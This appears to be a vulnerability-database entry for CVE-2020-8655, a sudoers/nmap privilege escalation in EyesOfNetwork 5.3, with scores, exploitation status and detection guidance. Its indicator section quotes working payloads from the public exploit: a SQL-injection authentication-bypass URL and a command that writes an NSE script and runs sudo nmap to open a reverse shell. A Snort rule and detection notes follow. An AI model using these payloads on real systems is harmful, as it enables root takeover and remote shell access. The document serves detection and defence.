CVE-2020-8655
published 2020-02-07

Priority: P183 (high), CVSS 3.1 base score 7.8
CVSS 3.1 vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Flags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 58.08% (99.0th percentile)
An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run arbitrary commands as root via a crafted NSE script for nmap 7.

Affected (1 range)

Vendor          Product         Version range   Fixed in
eyesofnetwork   eyesofnetwork   (not listed)    (not listed)

Detection & IOCs (extracted from sources)

path: /lilac/autodiscovery.php
path: /eonapi/getApiKey
path: /tmp/h4k
path: /usr/bin/nmap
url: /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
command: ;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
path: /eonapi/createEonUser
path: /login.php
port: 443
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Detect POST requests to /lilac/autodiscovery.php containing 'request=autodiscover', 'nmap_binary', 'target[]', and 'os.execute(' in the body — the combination indicates NSE payload injection for CVE-2020-8655 privilege escalation via nmap.
  • Monitor for creation of NSE script files in /tmp (e.g. /tmp/h4k) followed by execution of 'sudo /usr/bin/nmap' with a --script flag pointing to /tmp — this is the privilege escalation execution chain for CVE-2020-8655.
  • Flag the exploit-specific user-agent string 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37' in HTTP logs as it is hardcoded in the public PoC exploit script.
  • Detect the command injection pattern ';id #' or similar semicolon-prefixed commands with a trailing '#' comment in the target[] POST parameter of autodiscovery.php.
  • The Metasploit module requires HTTPS (SSL=true) and will not function over plain HTTP; RPORT defaults to 443.
  • The nmap privesc (CVE-2020-8655) depends on nmap version 6.40 being present, which lacks the -c and -e options, making NSE script execution the only viable escalation path.
  • Authentication bypass via hardcoded API key applies only to EON 5.3; EON 5.1 and 5.2 can only be exploited via SQL injection.

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      7.8     HIGH       CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd         v2.0      9.3     CRITICAL   AV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck             7.8     HIGH
cisa                  7.8     HIGH